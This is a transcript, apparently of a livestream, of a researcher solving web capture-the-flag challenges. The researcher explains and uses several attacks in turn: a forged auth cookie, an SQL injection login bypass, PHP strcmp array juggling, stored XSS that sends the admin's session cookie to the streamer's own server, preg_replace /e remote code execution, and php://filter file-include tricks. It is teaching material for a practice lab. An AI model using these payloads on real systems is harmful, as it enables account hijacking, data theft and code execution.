Hey everyone, how's it going? I'm feeling a bit bit croaky still, but hopefully less croaky than the other night. Um, Tonight, as promised, there's a lot of people, as I understand it, looking. Wow, I've got feedback going on. Pro tip: don't have your own stream open when you start streaming, or about 15 seconds after you start. You'll find yourself yelling at yourself, and no one likes that. No one likes me yelling at them, let alone me. So tonight, yeah, we're going through Menstrual's CTF that was part of the Brisbane Sec Talks challenge last month. Really good CTF. I really enjoyed this. My hat very much goes off to Menstrual. There's a good mix of challenges. There's some pretty easy stuff. There's some intermediate stuff, and there's two that had me really going for a couple of days and really, really tortured me. So I really enjoyed it. If you haven't given this a go yet, I suggest you do. I don't know how long Menstrual's going to be leading it up for, but I mean, I'll just drop this link in the chat real quick. At least I can see the delay. Now I know what you guys have to deal with. I don't know how long Menstrual's going to leave this one up for. I think maybe until like sometime next week, if he's nice to us. As I understand, he's hanging around in the chat, so maybe he can clear up how long you'll have to give it a go before it gets yanked down. But I've signed up for a fresh account, so we can be getting challenged. Yeah, let's see how many we can get through in one night. Hey, starting off with the easy ones. First challenge. May the source be with you. View page source. There it is. Easy warm up. Alrighty, moving on to the second one. Forbidden. You do not have authorization to view this page. Now, for the record, like I have done this challenge. It's been about a month since I've done them. Some of them I can remember how I did. Some of them I won't be able to. Some of them I'll need to work through again. But so this page is giving us a HTTP 403. If we have a look at our first hit to it, just to the root, what did we get? We got a 302 found, and we had a cookie thrown at us, auth being this value here. And then the 302 redirect sent us to index.php, which sends us back a 403 forbidden when we return this cookie auth equals blah. This looks like a hash, and the easiest way to crack hashes is to use the internet's rainbow table, Google. We see it's a SHA-1 hash for the string false. Yep, I'm seeing a few things telling me that it's the word false. But anyways, let's click the first link. It is the SHA-1 of the string false, so we can confirm that. Now, if we were just to echo false into SHA-1 sum, we'll get a different value to this here. The reason is, SHA-1 sum is a really super easy way. You can just pipe stuff into it to get hashes. The issue being, when you use echo, you get this pesky new line on the end. When you do echo -n, you do not get the echo on the end, the new line on the end. So echo -n false into SHA-1 sum, we get the same hash. Cool. So this here is the SHA-1 sum of the string false. Seeing as, you know, if our auth equals SHA-1 of false, we get forbidden. Maybe we need to set the cookie to auth to be the SHA-1 sum of true. So we'll echo true, the SHA-1 sum, we get this guy here. So we'll just grab this request, right click, send a repeater. This is burp, by the way. If you haven't used burp before, I don't know what's wrong with you. Burp is sensational. Grab this, paste it in, Paste is broken in burp. Burp is sensational, but paste is broken. Fire this off. And we get a flag back. Punch it in, and that's another one down. We're moving quickly, but we're going to slow down shortly, I guess. Bobby. Login. And if anyone doesn't know about Bobby tables, then this is going to be funny. Classic comic. So when we saw a login page back here, the challenge is called Bobby. That's the thing about all these challenges as well. I've found that the names tend to hint at what the challenge is or what sort of challenge it is. So this is the classic SQL injection comic. So this is probably a SQL injection bug, bad login. Just chuck a quote in the username, a quote in the password, and we get an SQL error telling us that there was a quote was in the string somewhere, or a quote. It's probably telling us. There's a syntax error somewhere in the region of a quote. So now let's put a quote in the username, b quote in the password. Okay, so it's not the a quote in the username that's giving us the SQL error, it's the b quote in the password by the looks of it. If we go back, we just go a quote for the username, nonsense for the password. Oh no, I didn't put a quote. Looks like we've got unbalanced quotes, even with a quote in the username and just a in the password. Alright, both fields are probably injectable. Let's check a quote. Yeah, okay, cool. Both fields are injectable. So what we imagine this might look like on the back end is like we're logging in with a username and a password. We imagine that the page that we send our username and password to, which then, where are we sending the username and password to? Just sending it to, posting it to slash as post parameters. So the PHP page, or probably PHP, we're talking PHP, it's not telling, it's probably PHP. The PHP page behind slash is probably doing something like this. One, fire off a SQL query and get some results. Two, based on those SQL query results, make an authentication decision. So this query might look something like select, I don't know, something from some table, probably users, where some column, probably the username, equals user input, and password equals user input. This is where we're able to inject some data into the overall SQL query. So, you know, like if we go and put in ASDF, HJKL, right there, then it was probably doing something like ASDF, HJKL, you know, and select something from, I'll probably say users, where it's probably what it was doing. So we need to think about something we can put into one or both of these locations in the query that will give us something beneficial. Because if we look at number 2 here, based on the results from this SQL query, the page is making an authentication decision. Might be saying, was at least one line returned? Was exactly one line returned. Because this here, if we were to get the username and the password right, would return one row. Like if we gave a valid username and valid password, probably return one result for that database query. This page behind the scenes here might be checking for, as long as something came back at all, then log the person in. Maybe it's clever. Maybe it's like, all right, we know that there can't be duplicate user registrations. You can't get the username and password correct for 2 people at a time. So maybe it's doing some more strict checking. Let's just go off this first theory for now. Was at least one line returned, and see if we can achieve that condition from this here. Like if we were to set the username to be ASDF single quote, keeping in mind we're controlling this here. If we can bring our own single quote to the party, which it looks like we can do, if we put single quotes in, then we get errors coming out at us, which indicates we can bring single quotes to the party. So what if we put our own single quote there, and we want to finish off this query here. Select something from users where username equals some nonsense, or 1 equals 1. It's going to always return true if we select something from the table where username is some nonsense. That's going to return 0 rows, or 1 equals 1. But then there's all this trailing garbage here. What we can do is we can use semicolon to finish off the query. But then there's still going to be this nonsense here that we could probably just comment out. The comment, sequence in SQL is generally double dash. But now some DBMSs are pretty strict about this double dash. It'll consider, double dash to be a valid comment. It'll consider double dash, some white space, and then garbage to be a valid comment. But some DBMSs, if they see double dash and then garbage without a space here, that is no longer a comment, a start of comment delimiter. And if we were to just leave this as being double dash, then this query would become we'll just paste this in the middle here of the username portion of the injection that we have over the username query. So I just did a paste then. We get this. Select something from users where username equals ASDF, that's not going to return, or 1 equals 1, that's going to return the whole table. Semicolon's going to finish the query off. But then dash single quote under some DBMSs is not a valid start of comment, and then this is probably going to throw a syntax error. So that's no good. What we could do to make this here a valid start of comment is to append a single space. That red block means trailing space there. And then we would get something that looks like this. Put a space in here. And that's looking pretty legal to me. We've got select something from some table where nonsense or 1 equals 1 will return the whole table. Semicolon, end of query, dash dash, start of comments, some white space and nonsense. That's totally legit. But I've got this habit because I'm paranoid and I've been burnt by exploiting SQL injection and getting nowhere for far too long before. I don't like doing this here. I don't like sending off that to an injectable application because some developers do a trim. They call the trim function on inputs that they get. And what trim does is it's going to get any white space on the left-hand side, any white space on the right-hand side, and throw them away. A lot of developers just like to trim their data as it comes in because they know that trailing white space, people generally didn't mean to actually do that. They may have accidentally hit the space bar or they may have pasted something in a bit funny. So developers just go and trim trim off the nonsense. And if you were to run trim on this, it would get rid of that white space at the end, and we'd be back to this issue. So what I like to do is after the space that we're putting on, just put anything. You could put the letter A or ASDF. I just generally, as a habit, do a dash. I do dash dash space dash. And what this means is it's going to look something like this. Which is still legal. You know, it's like something from somewhere where some nonsense or 1 equals 1, end of query, begin of comments, trailing comment. That's totally legal as well. But what this extra dash is a bit of insurance against trim killing this space. So if we grab that there, paste into the username, password, ASDF, there we go, we've got a flag. So it probably did end up looking something like this on the back end. Select something from somewhere, blah, blah, blah. And either, there's only one line in the table anyway, and either one of these checks was the one being done on the back end, or the back end was only checking this condition here. It didn't have the foresight to check if exactly one line was returned. So we're in, we've got a flag. Pinch that, paste it there, and we're done. Close that, get rid of all this nonsense. Next level, competition without the O. Forget this one, what was this one? Okay, so we get a login form and we get a link to some source code. Yep, so we've got a form, we've got username, password, it's a post form, then there's a link to index.txt which is going to give us the source. The source is its PHP file. The variable having the flag in it has been removed, username and password have been removed. We have a check. If the username and the password were both set, the post in the post array, so if the username and password were posted to the page, then we do an if stir comp. This username here, which has been removed, against the submitted username. If that stir comp is equal to 0, and a stir comp between the password and the password that was posted is equal to 0, then we echo the flag, else bad login. So this bad login should be easy to trigger. Just send nonsense, and we get bad login. So we ended up here with nonsense. If we want to get the flag echoed, then we need to make sure that we achieve this precondition, which is easy. We've just got to post a username and a password. And we have to achieve this one as well. We have to cause the stir comp between the hard-coded username and what was submitted to be equals to 0, and the stir comp between the hard-coded password and the one that we post to be equal to 0. What am I doing? Good to have you around, OJ. What am I doing now? What have I missed here while I've been hacking away? Duke's t-shirt should be in for a challenge. Okay, pound works as a comment delimited too. Yeah, I think it might depend on the DBMS as to which ones you can use. Yeah, dash dash space dash is a favorite of mine. Works against MySQL quite nicely. Right, yes, smashing the waters. Alright, stir comp, hey? Let's read up on the PHP stircomp function. It's a binary safe string comparison function. You pass it 2 strings. It's case sensitive. Stir1 is the first string, stir2 is the second string. Makes sense. Returns less than 0 if stir1's less than stir2. Returns greater than 0 if stir1's greater than stir2. And returns 0 if the 2 strings are equal. So based on that, we can see that it's checking to make sure that the username we posted is equal to the hard-coded one. It's also checking, it's got an AND operator in here, if the password that we posted is equal to the hard-coded one. So that's what it means when it's checking for equals 0. It's making sure that this stircomp is returning the fact that this string and this string are equal. So we keep on reading, because the thing about PHP.NET Manual is you don't have to scroll too far before it yells at you about some security consideration, or you go down to the comments and people yell at you about the security considerations. So if you know the vulnerable function in a challenge, just read the PHP man page and it solves it for you. It's got some alternative functions that we could refer to. User contributed notes. If you rely on stircomp for safe string comparisons, both parameters must be strings. The result is otherwise extremely unpredictable. For example, you may get an unexpected 0. That sounds good. We kind of want a 0 that the application doesn't expect to be giving to us to indicate that we got the username and password correct when we actually didn't. So if we were to stircomp the string 5 and the number 5, we get 0. If we stircomp the number 15 and OXF, we get 0. Okay. If we stircomp this really big number and this slightly less big number, we get 0. They're not even the same number. If we stircomp null and false, null and blah blah blah, do any of these help us? If we stircomp the string foo and an array, then we get a null and a PHP warning. This one's interesting. If we can cause one side of the comparison, because I mean, we only get to control one thing for each. That's hard-coded to be this value here, but we can control this side of the comparison. Same thing over here. We don't control this, but we do control that. So this can be foo, but if we can make the other side be an array, then we get null back. And in PHP, is null equal to 0? Okay, so null is equal to 0. You can tell my PHP is totally up to scratch, by the way. So this looks good, because if we can get stircomp, each of the stircomps to return null, then it'll be equal to 0. It'll be equal to 0. We should win. And there's a trick with PHP. There's a lot of tricks with PHP. As far as getting this to be an array, because I mean right now what it is $_post is an array of all the post parameters to a page. But we want the username element of the array to actually be an array. If we can manage that, then we win. And I never remember how to do this, so I just start throwing things at it till it works. Do you put So this, if we submit this, bad login, you could just put square brackets after each one. Does that do the trick? There we go. So by putting square brackets after each of the variable names, someone correct me if I'm speaking out of place here, then it caused the username element of the $_post array to itself be an array. And then when we stir comped this string against the array, we got null, as we saw here. Null is equal to 0, and as we saw here, when you stir comp a string and an array, then you get null. So we should be able to actually stir comp ASDF. Do we just do array bracket bracket? So if stir comp that yeah, if we stir comp any string against an array, then it comes out equal to 0. It comes out as null, which is equal to 0. Oh yeah, OJ's actually, I think OJ used to be a developer, so OJ's actually probably putting the correct spin on my words. Would equals, yeah, good point. Yeah, that didn't work because zero is not equal to null. OJ, would that actually be the fix for this code to use triple equals, or is I mean, does stir comp easy out? Sorry, not easy out, early out, because there's probably a couple of bugs in here. I mean, that's probably a valid fix, but it's probably not the right overall fix, is it? So, okay, cool. That's that challenge down. Just go and basically put square brackets in all the places till something works. Try to get stuff to be an array, and stir comps do fun stuff. Alrighty, Oreo. Log into file and ticket. Create an account here. Account created. Log in. Okay. Let me go turn my proxy on real quick because I think this challenge is likely to leak my IP address. I've probably done it already somewhere without noticing. Okie doke. Welcome back. Okay, so we've got a this one's called Oreo. We've got a support center, a ticketing application. We can look at our own tickets. No tickets have been lodged. We can create a ticket. Issue summary. Describe the issue. Your ticket's been created. We will check it very shortly. Bail out of here. We can see our own ticket. And there's the details. So this smells to me like they're already telling us they're going to check the ticket shortly. This smells like cross-site scripting. So if we just go and chuck in horizontal rules into both these fields, your ticket's been created. All right, this is looking pretty good. We can see that here is a HTML horizontal rule already. Yeah, this HR that we submitted is getting sprayed back actually in the DOM as a legit HR. So if we drill down into this ticket, then on this page, if we go back, actually I shouldn't have made them both the same value, ASDF, HAKL, yeah, okay, so on this view here, we can see that the title is injectable with the cross-site scripting. But if you actually view the ticket, then the body is injectable with cross-site scripting. Cool. So we know that the application promises us that, I think they said we are going to look at it shortly. Yeah, let's resend that one. Yeah, we will check it shortly, which tells me that there's probably an administrator sitting behind the scenes either looking at the list of tickets coming in which case if we put some nasty JavaScript in the ticket title, they will have that rendered on their system and they'll view it. Or the admin might actually be clicking on tickets and having a look at it in this interface here, with the ticket body being cross-site scriptable. Third option, the admin could be looking at a totally different interface, and some combination of both of them or either of them could be cross-site scriptable in that interface. So the best way, one of the quickest ways to check if there's, for a CTF challenge, if someone's kind of looking out for things you're doing, is just to go and jam some image tags. So we sudo so this is just a VPS I've got out at DigitalOcean. So if we just go and jam some image tags in here, let me just check that proxy. Yep, hopefully that works. Hopefully it doesn't spray my IP address on stream. If we go and jam some image tags into each of these fields and then kind of sit and wait for a few minutes, then maybe there's an administrator who is viewing either the list of tickets or drilling down into the tickets and having one or the other of these two fields appear rendered as HTML in their interface, and we can basically cause them to request an image from a web server that we can see the logs of. Yeah, thanks, OJ. In case you missed my stream the other night, I totally sprayed a randomly generated password into the stream, which I still haven't changed because I'm slack. But it's not a password I use online. So if we go and spray image tags, image source equals, that's probably just a bot. I was going to think that was probably OJ trolling me. qw.lc/doot. Yeah, please don't hit this web server and spray stuff on stream. So if we just go and spray this image here into both the title and the description. Actually, let's put the number 1 in the title and the number 2 in the body of the ticket, and that way we might get an idea of which field the admin is having appear as rendered HTML in their interface so that we know where to go from here. Because if either of these or both of them are being displayed as unencoded HTML inside the admin interface, the admin should request 1 or 2 images from our web server. So we'll send that off and see what comes back. Yeah, nice work, Menstrual. Oh yeah, I own it, hey? Alrighty. The fact that the user agent string for this hit here is Phantom.js tells me it's probably not one of you jerks trying to troll me. It's probably the admin. Phantom.js is a little headless browser that can be used to basically provide the admin perspective for a cross-site scripting challenge. Which tells me that it's probably this field here that the admin has basically got popping up as raw HTML in their interface, and it's cross-site scriptable, and we can basically cause the admin to throw images. Images aren't that exciting. We want to get some JavaScript executing. So I mean, if we just did image source equals x, on error equals alert 1, just kind of the classic. we do that, we go back, and we get ones popping up everywhere. We basically want the admin to, there's my hits, and that's not my IP address. We basically want the admin to execute some JavaScript, but I mean, alert1 JavaScript's not that interesting. It's not going to actually get us anything. I mean, maybe we want to log into the application as the admin, in which case we should probably have a quick look at the state of the cookies for this application. Does Chromium tell you the security of cookies? So it's setting a PHP session ID. I think that means it's not HTTP only, not secure, which means that JavaScript can access the cookie. Document.cookie. Maybe we can run some JavaScript on the admin's machine, in their browser I should say, that will get the cookie and leak it to us somehow. Let's try this. What if we run the script var I equals, is it new image bracket bracket? Yeah. So we'll run this JavaScript to create a new image. I.source equals / qw.lc / cookie underscore, and then concatenate .cookie. So I'm just basically sketching out some JavaScript in the console here. This is not running it on anywhere but my own machine, but it's just kind of helping me to get my thoughts together. So if we run this code here, then it'll set the source of this new image that we've created to be my website with document.cookie appended to it. And Chromium got a bit excited and went and tried to fetch it straight away. And you can see that it tried to download my website / cookie underscore PHP session ID equals my session ID up here. I've got a 404, but the neat thing is we can then check my HTTP logs and see that it's kind of got this 404 being logged because it tried to download this file which doesn't exist. I don't think browsers generally, if you run this, then that, go and fetch the file automatically. You've got to do document.body.appendchild I think you've generally got to go and throw it into the DOM to have it actually then be requested by a browser. I don't think this is normal. Someone might be able to clarify, but I don't think browsers go and download images just when they get basically instantiated like this. I thought you had to append them. Either way, we can do all three to the admin. So we want to create a new image. We want to set its source to be a URL that we can see the web logs of with document.cookie appended to the string. Which then JavaScript will basically substitute the cookie value into this string here before assigning it to the image's source parameter, and then we'll just go and throw it into the DOM. So this here, let's see if we can get the admin to execute this for us. So let's wrap that in single quotes. So we're just going to basically do another image, and we're going to set the URL to load the image from to just be X, which is I'm pretty sure, non-existent file. Yeah, good. And when the admin's browser fails to insert this image here into the page, it'll then throw an error, and then on throwing that error, it will execute this code here, which should then dynamically create an image object with its URL being something that JavaScript can insert the document.cookie value into, append it to the page. It should go off and try to download that file. So copy that to the clipboard. Just go and chuck it in both fields because why not? Send that off and see how we go. Your ticket's been created. If we go back, then the page breaks catastrophically. What happened? Image source equals that, on arrow equals blah, image source equals document dot AP. Okay, the page is truncating what we send, or the application is truncating what we send as a ticket title down to this stubby little string here. So we tried to send this, but what we actually only managed to achieve was this much. So we've got 100 characters to work with in the title before it gets truncated. Let's see if we can trim this down a bit. $102, close. That looks like it's legal. Looks like we didn't need these brackets. And that brings it down to 99 characters. Let's try that. So that there was us, having fallen for our own trap. And this was Phantom JS. This was the admin falling for the trap, and we have got their session ID. So if we just go and copy this here, we just run document.cookie equals, this is just a really cheap way of setting our own cookie. And then refresh. Welcome back, administrator. So we've just managed to steal the admin's PHP session ID cookie and log in as them. Go to admin, and there's our flag. Too easy. And that's Oreo done. Any questions on any of these 5, 1, 2, 3, 4, 5 so far? Hope I'm not going too quickly. I'm just trying to get through as many as I can in one night because I feel like getting through as many as I can in one night. Yeah, cool. No worries. Did you, Jardeth? Did you follow along? Did you see the theory behind? I mean, have you played with cross-site scripting before, Jardeth? Yeah, cool. Ah, is it stripping bracket script, is it? That was a trap well dodged, wasn't it? Yeah, it's a good idea, just to hijack the original one. Would have saved having to try and play JavaScript golf and get it down to 100 characters. Yeah, it's a good trick, this one. Yeah, cool, okay. So if everyone's keen, we'll move on to the next one and see how we go. Ebang. Flag is inside flag.php. Errors are hidden. Welcome to Ebang, the most sophisticated web-based find and replace tool. What have we got? Any phrase here? Find, replace, submit, output. Bunch of bootstrap nonsense, bunch of jQuery nonsense. Okay, so we're being told it's find and replace. ASDF, let's find D, replace it with toilet, submit, and we get back AS toilet F. Okay, so it's doing like a sed style, find and replace. Yeah, kind of like this. Hence being the most sophisticated web-based find and replace tool. Cool. So we can put a message in here, put in some sort of thing for it to find, and tell it what to replace it with. And it'll be a web-based find and replacer for us. Righto. The way to do this in PHP, and this just comes from personal experience and also seeing Ebang and seeing all this and knowing what to do straight away, because this is a fantastic gem of a trick, is preg replace, I think. Let's turn this proxy off. Apparently people have been abusing Google from DigitalOcean, by the way. PHP preg replace. Preg replace, perform a regular expression search and replace. So it's a PHP function. If we pass it a pattern, a replacement, a subject, optional limit, optional pointer to count, variable to store the count in maybe. So the pattern is the pattern to search for. It can be a string or an array with strings. So it looks like it's probably a regex. It's like we can do ASDF and find S plus, replace with toilet. We should get back a toilet. No. Maybe it doesn't support regex. Do you need a flag to do regex? Anyway. Replacement, the string to replace. Boring array stuff. Subject, the string to search and replace. Blah, blah, blah. Blah, blah, blah. We can see in the changelog that support for this with the /e modifier has been removed. Use preg to replace callback instead. Do we get a version of PHP running on this server? Nope. Do we have to do slash for the regex and /s plus / toilet? Yeah, there we go. No. Didn't respect the plus. Anyway. So I mean, I'm guessing we get to control the pattern to find, the replacement we can control, and the subject we can control. I'm guessing that's the message. So it looks like we control 3 arguments to preg replace. So what this gives us is use of this /e modifier, which would match with the name of the challenge. Can we get some doco on the E modifier? Because it's a gem. Trying to find some doco on it. Looks like PHP have hidden their shame in the deprecation of the modifier. See the preg replace eval doco for additional information about security. Security risks sounds super attractive. Let's see what this has to say. Here we go. Pattern modifiers. Current possible Perl compatible regex modifiers listed below. We've got I for case insensitive, M for multi-line, blah blah blah. E for preg replace eval. It was deprecated in 550 and removed in 700 for good reason. If this deprecated modifier is set, preg replace does normal substitution of back references in the replacement string, evaluates it as PHP code, and uses the result for replacing the search string. Evaluates it as PHP code and uses the result for replacing the search string. Single quotes, double quotes, blah, blah, da, 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 da. Is there an example? An example is in the pattern, which is looking like a regex, E. Go back to this docker. So the pattern has this, I'm guessing that's one way of specifying the E flag outside brackets, maybe. In the second parameter, that's not what I wanted. The replacement, we've actually got this here. In the replacement, we've actually got some quoted strings with back references to the regex in them, the $1, and then PHP code, which I'm guessing gets executed, and then this here, once it's been interpreted by the PHP interpreter, then gets used as a replacement, and then HTML, $HTML is what we're searching over. Use the modifier is discouraged as it can introduce security bugs. I mean, I'm guessing this application doesn't use the modifier, but I'm guessing that we can control all three parameters with these three inputs, so we can bring it to the party. Only preg replace uses this modifier. It's ignored by other functions. Let's see how we go. So if we search for, if we give a message of A, and we look for /A//, I think that's how you might do a regex maybe. End it with the E flag and replace it with PHP info, like the string PHP info, which then should be interpreted by PHP and executed. I mean, then we should end up looking through this message for the letter A, finding it, and then executing this and replacing the A with the output of this. If we submit that, we get PHP info running. Righto. So we'll go back, and rather than running PHP info, what I normally like to do is basically stage the execution of arbitrary stuff. So let's, instead of running PHP info, let's run eval $_request, which is an array. We're going to pull the C element out of the array. So we're going to get this here, and then just eval it, and actually, there's not even any need to do that, because we can just go back and put new code in here. We don't really need to stage a whole new thing. We might need that later. All right, replacement. What are we going to run? Can we system out? Yep, we can system out. Oh, that'll do us. Let's go back and get this back. I mean, we'll be told flags inside flag.php, errors are hidden. Let's just do an ls. Okay, so we can see a JS directory. Can we see anything else? Yeah, Okay, so flag.php is in the directory we're in. So let's just run system cat flag.php. And there it is. Oh yeah, so you can see that it was prefixed with bracket question PHP, which means this, if we just browsed straight to flag.php, then the code would execute, which in effect, all it does is sets a variable. Anyway, here's our flag. Preg replace. Do not let people control the pattern in its entirety if they can influence the replacement. Actually, just don't let them control the pattern in its entirety. Check to make sure they're not doing preg replace with the E modifier. Or, even better, upgrade to PHP 7 because they got rid of this dumb kicking yourself in the junk feature. Echo $flag. Let's give that a go. PHP error. Did the page die a tragic death because flag was undefined? Just ditch PHP. Number 7 brings all new vulns. I cannot and will not argue with that, minstrel. Alright, we got ourselves a flag. Somewhere. There it is. Yeah, cool. Done. Ghostbusters. The flag's inside flag.php. The files are in the computer. Welcome to the Ghostbusters fan site. We can browse around. This is looking interesting in the URL. This is looking boring. Seeing a slash in a P parameter is always good. I'm guessing this here is the path to a file to include. If we just set it to ASDF, we get a whole bunch of blankness. Somewhere in here, wherever there's supposed to be content, probably in here. So ASDF gives us nothing. bio/./egon. I'm not a Ghostbusters fan. Will still give us that. A // gives us nothing. If we go back into bio/, if you can do shenanigans like this, you know, a // repeat yourself, and the page comes out as it was, then you've probably got a directory traversal-ish thing going on. And I'm guessing that this here is the path to a file that probably index.php is including. What if we do p equals index? Oh, p equals... Oh, I wanted to get like the infinite. Anyway, interesting. Probably not going to work, no. Because I mean, it was weird that these didn't have extensions. Because if we just go /about, we get nothing. Go about.php. See this about here, this page here matches what we saw here. So it seems like the application's appending .php to whatever we put in this parameter, and then including the file. Let's see if it's a super old PHP. null byte truncation didn't work. Sad face. Do we control the beginning of the string? What are they called? Are they called input filters? Yeah, this trick here, this is a classic. If we grab this here, if we specify that the thing we want to include is php // filter / convert .base64 encode / resource equals, and then give it a file name, we won't give it about.php because we know that it already appends .php to what we give. So I just saw in the wrappers. Thank you. That's what I was looking for. Wrappers. We know that .php gets appended for us. If we go and fire this off, because I mean, I reckon there's one of two things are going on here with this whole. Let's go back to the about with this thing here. Oh, neat. Thanks for that, OJ. That's totally new to me. I'll have to play with that. Like PHP filter convert. So if you wanted to double base 64, what would you do, OJ? Because that's super neat. What I reckon's going on the back end here with this parameter is one of two things. I reckon it's probably including it. Can't type tonight. Oh, Peleus, good to have you around. No, I just humour him. You know me, you know him. Oh yeah, thanks OJ, I'd really appreciate that. That'd be super. I'm just kidding. Good to have you around, Peleus. Good to see you. I reckon there's one of two things going on in the back end here. I reckon there's an include going on. The first option is that I don't know what to call it, long form. Like it might be doing include / www.html default / I think it's a dot in PHP. Yeah, it is. How's it going? I am Smidix. PHP filter. So filter / convert basic encode / convert .basic4 encode / resource equals. Yeah, very cool. Thanks, OJ. I reckon this here could be doing this, or short form. If it's doing this, our use of filters is going to be, or wrappers is going to be dead in the water. But if it's doing this, if we can control the beginning of the string that gets passed to include, then we should be able to do this, PHP. It's kind of like HTTP // but it's PHP. Filter convert base64 encode resource equals about is going to end up looking like this. This here will get replaced with that. So you resolve that down and you get that. And what this here is going to do is it's going to take this file in the file system in the current directory and base64 encode it before basically returning that file contents having been base64 bubbling it up to include. Because if we just duck back here, the flag's inside flag.php. If we go p equals flag, we ain't going to see nothing. Because I bet, it's kind of like the previous challenge, I bet the flag looks something like, I bet the file looks something like that. And when include opens up a file that looks like this, it's going to execute it. And it's going to actually set the flag variable, but it won't actually leak it out to us. But the neat thing about doing something like this, by passing in that as a p parameter, is that the contents of the flag file will get base64 encoded before bubbling up to the include function, which when the include function goes to execute it, it won't see this anymore. It'll see this. Actually, I'm not going to bother. It'll see a bunch of base64 encoded nonsense. It's not what I wanted. It'll see that. When it goes to execute that as PHP code, it will just return it as a string. And then we can PHP base64 decode it and hopefully get our flag. So let's do this. Let's start off with about. If we go and pass that in as the p parameter, oh, it's going to make me look stupid, isn't it? Yup. I got way too excited about that. Am I using this correctly? Yeah, I reckon I am. PHP filter, convert. Fizzer. I was really keen for that too. Hang on, okay. It'll come back base64 encrypted. Refresh. Good learnings anyway, yeah. Sometimes this works, sometimes it doesn't. Maybe what's going on is this kind of junk here, where we don't actually control the beginning of the string. Maybe. So where does this leave us? I mean, we've got a local file include, but the file's got to end with .php, because that null byte definitely didn't work, did it? Nope. Check the string you sent. Oh, did I sound like a question mark or anything stupid? Equals maybe. Oh, did I? Back. No, there's none there, but I mean, is it an encoding issue? Do I need to encode the equals or anything? No, that doesn't look any better. Neither does that. No, good idea, but no, there was no double quote at the end. Alrighty, that didn't work. Whoops. Does this page give any more bright ideas? Does the data protocol work? Nope. Yeah, you got this one, Peleus. Give Barney the good oil. Let's go for the flag. Thanks, OJ. What was happening there? Why wouldn't about work? How bizarre. What could be doing that? What about the bios? Do they work? Is it a length thing? Like, was the string getting truncated? No. Huh. That's got me just bamboozled now. Anyway, here we get what looks to be a base 64 encoded string. Good call, OJ. Thanks for that. If anyone's got any ideas as to why that worked but about didn't, let me know, because... Huh. Get the index and see what's up. Good call. I mean, but is there an index.php? Oh, yeah. Can't get the index. Is that menstrual? Is that some sort of protection you put on there so we couldn't go poking around at stuff we shouldn't be seeing? We've got a flag at least. Robert's books. I'm going to tear these down and move on. You know what? I'm going to take a 5-minute break, get myself some iced tea. Yeah, menstrual's gone and deserted us all in our time of need. Yeah, let us know, Demetrius, if there's if you think it's changed. That's super weird. I'm gonna get some iced tea. I suggest you all get yourself a nice cool beverage for the second half of the evening. Let's see if we can finish off these moderate ones, and I don't know, maybe we'll see how we go for the hard ones. Yeah, cheers, Menstrual. I'm gonna see you all in 5 minutes. Hey, take care. Hey, we're back. Whoop, let's bring the microphone down. Now we're back. So I was just kind of catching up with the chat here. First of all, Jareth, are you going to continue where you left off on Sunday? Probably not. There's a story there. So if you missed Sunday, what I was doing was I was having a very light, and if not light, it was quite heavy for me. It was quite annoying. I was trying to re-implement a lot of the rat logic in Empire, because there had been murmurings on Twitter about a patched bug that I wanted to see if I could exploit just for the lulz. So it was for the lulz, and it was a bit of hands-on, me going in blind, and the approach I take to reverse engineering and re-implementing the logic of a rat, trying to get my own Python harness from which I could interact with the Empire command and control server. So that's what I was doing. The question is, am I going to continue with it? No. Because after the stream finished, I actually had a few ideas of things that I'd seen during the stream that I wanted to explore, and I found a bug. I was like, yes, found a bug. Then I wrote an exploit. Then I wrote a Metasploit module, thinking, all right, I want to see if I can chain, because it was a pretty low value bug. I want to see if I could chain that with another bug and kind of release a bug chain. And then the next day, I had a bit more of a poke and caught wind of the fact that a new release of Empire is coming out shortly, and there is a Git branch called 2.0 beta, which I had a look at, and my bug is still there, but it's been paved over in a way that makes the bug totally useless. Basically, the value that the bug gives you, you already need to have knowledge of to exploit the bug that gives you the knowledge. So it's become a totally dead bug. I mean, I might dive back in and have a look at some of the new code, but I'm not that interested in creating an exploit for the publicly disclosed and patched bug, because so much of the code has churned that it's not really worth doing anymore, I don't think. But I'm going to continue to poke at Empire, and if I find stuff, then I'll be reporting it to them and going from there. But probably not on stream. I think I'm done for that. Yeah, cool. I mean, that was it was largely a process kind of thing. I mean, I might jump back into it if people are interested in seeing the process in creating a Python harness for a now out of date bit of software, because I've looked at some of the logic in the new version and really couldn't be bothered doing that. So I mean, I might go back and do it for the old version for the learning process rather than anything useful, I think. Maybe, we'll see. I'll put it on the list. So I was also reading that Menstrual had, if flag isn't in the page, it changes the include path to be relative. So // your value.php, and the // is going to kill this here. So, and Menstrual did it. Why did he do it? Something I added to stop people snooping around. And normally the thing I was doing where I just go resource equals about would work. But Menstrual decided if the word flag doesn't appear in here, he's going to make it unexploitable to stop people poking around. Let's go poking around, because I figured out a way to get around that off stream. So check this out. And this is OJ. Thanks for your tip that wrappers can be basically pipelined, by the way. So we've got this PHP filter, we've got this convert base CTF encode, and OJ was saying if I wanted to double encode it, I could just copy this and do it twice, and you get a double base 64 encode by basically putting two in a row. So I was playing around. It's like, okay, cool. Let's get rid of this second one here. Can't see the URL. Move your head. Oh, sorry. Yeah, I've got my head up in that corner, don't I? Whoop. Sorry about that. Thanks, OJ. So normally it looks like this, yeah, resource equals flag. But we can pipeline and put extra wrappers in between the extra slashes. And I was like, does it have to make sense? Can you just do this, enter? Yes, you can. What if we just go and put the word flag in this useless part of the pipeline? It still works. And we go resource equals about. And there we go. Now we can read arbitrary PHP files base64 encoded. Sorry, Menstrual. Let's have a look at what's going on. Let's go and actually dump out. Oh, I can't dump index. Have you got a second layer of protection stopping me from using the word index, maybe? Nope. We can't use. Can we do dot dot slash index? Dot dot slash dot dot slash. Oop. Huh. Because there is an index.php, yeah? Yeah, there is. Maybe index.php lives in some part of the file system that we don't quite know about. Okay, that works. Why is index not working? No default folder. That works, does it, OJ? Huh. Really? Mental's gonna have to stop telling me stuff now. What was that? Send me a private message, dude. Remind me, because I can't remember what that was that I did to you. Sounds like something I'd do, but I can't remember what it was. I can't believe that works. That's awesome. Nice find, OJ. That totally shouldn't work. Well done, PHP. Well done. Index? Oh, I want the index PHP. Oh, no, that's home. It's something different. Oh, well, I really wanted that. Sad face. Oh, well. Ah. Huh? Hang on. Yeah, it should be the same as about, but I don't think the slashes are still. I don't think that's right. We go about. If we go resource equals. Yeah, I think once you do resource equals, this all here is a file name. I don't think these slashes make any difference. Like we can go like about, we go like ASDF / about, and it breaks. So I don't think these slashes terminate anything anymore. I think once we're in resource equals land, there's no turning back. It's all a path. But yeah, you shouldn't be able to basically like. That's a file. That shouldn't work. Like 